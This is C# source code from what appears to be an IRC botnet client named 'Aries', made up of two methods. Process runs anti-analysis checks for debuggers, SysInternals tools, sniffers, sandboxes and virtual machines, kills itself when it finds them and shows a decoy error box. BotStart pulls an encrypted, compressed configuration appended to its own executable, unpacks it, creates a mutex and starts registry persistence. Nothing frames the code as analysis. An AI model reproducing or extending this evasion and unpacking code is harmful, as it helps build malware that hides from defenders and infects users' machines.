public void Process() { Config config = new Config(); new CheckDebugger(); CheckProcess proc = new CheckProcess(); if (Convert.ToBoolean(config.SafeAnti(Config.SafeAntiType.AntiSysInternals))) { new SysInternals(); } if (proc.IsProcessRunning("api_logger") || proc.IsProcessRunning("api_logger") || Util.GetModuleHandle("api_log.dll").ToInt32() != 0 || proc.IsProcessRunning("proc_analyzer")) { Environment.FailFast(new Random().Next(5, 100).ToString()); } if (Convert.ToBoolean(config.SafeAnti(Config.SafeAntiType.AntiSniffDebug))) { new Sniffers(); } if (UseAnti(Type.AntiSandbox)) { new Sandbox(); } if (UseAnti(Type.AntiVirtual)) { if (new Virtualized().IsVirtual()) new AntiFound(); } if (UseAnti(Type.UseErrorMsg)) { if (UseAnti(Type.ShowVirtualOnly)) { if (new Virtualized().IsVirtual()) { Config AntiConfig = new Config(); System.Windows.Forms.MessageBox.Show( AntiConfig.Anti(Config.AntiType.ErrorBody), AntiConfig.Anti(Config.AntiType.ErrorTitle), System.Windows.Forms.MessageBoxButtons.OK, new Config.Settings_().GetIcon); } } else { Config AntiConfig = new Config(); System.Windows.Forms.MessageBox.Show( AntiConfig.Anti(Config.AntiType.ErrorBody), AntiConfig.Anti(Config.AntiType.ErrorTitle), System.Windows.Forms.MessageBoxButtons.OK, new Config.Settings_().GetIcon); } } Util.AntiCheckComplete = true; //System.GC.Collect(); }
public void BotStart() { new Thread(Instance.lowTimer).Start(); //new Thread(new ThreadStart(Main.Instance.AntiTimer)).Start(); Aries.Util.AntiThread.Start(); //Anti_Timer.Interval = 60000; //Anti_Timer.Tick += new EventHandler(AntiTimer); //Anti_Timer.Start(); /*FileSystem.FileOpen(1, System.Windows.Forms.Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1); string HostFile = Strings.Space(Convert.ToInt32(FileSystem.LOF(1))); FileSystem.FileGet(1, ref HostFile, -1); FileSystem.FileClose(1);*/ string HostFile = Encoding.Default.GetString(System.IO.File.ReadAllBytes(System.Windows.Forms.Application.ExecutablePath)); string[] HFile = Strings.Split(HostFile, "&^*", -1, CompareMethod.Text); HFile[1] = Config.FSplit + Encoding.Default.GetString(Decompress.DecompressData(Encoding.Default.GetBytes(HFile[1]))); Config.File = Strings.Split(HostFile, Config.FSplit, -1, CompareMethod.Text); Config.ErrAnti = Strings.Split(HFile[1], Config.FSplit2, -1, CompareMethod.Text); Config.Settings = Strings.Split(HFile[1], Config.FSplit3, -1, CompareMethod.Text); Config.IRCSettings = Strings.Split(HFile[1], Config.FSplit4, -1, CompareMethod.Text); Config.File[1] = Strings.Split(Config.File[1], Config.FSplit2, -1, CompareMethod.Text)[0]; mutex = new Mutex(false, new Config().SafeAnti(Config.SafeAntiType.Mutex), out createdNew); //compress -> reverse -> encrypt //decrypt -> reverse -> decompress Config AntiCls = new Config(); SimpleAES aes = new SimpleAES(); if (Convert.ToBoolean(AntiCls.SafeAnti(Config.SafeAntiType.Encrypted))) { Config.File[1] = aes.Decrypt(Encoding.Default.GetBytes(Config.File[1])); } if (Convert.ToBoolean(AntiCls.SafeAnti(Config.SafeAntiType.compressed))) { Config.File[1] = Encoding.Default.GetString(Decompress.DecompressData(Encoding.Default.GetBytes(Config.File[1]))); } Config.File[1] = Reverse(Config.File[1]); new Thread(Aries.FileRegistry.SetAllFilesReg).Start(); }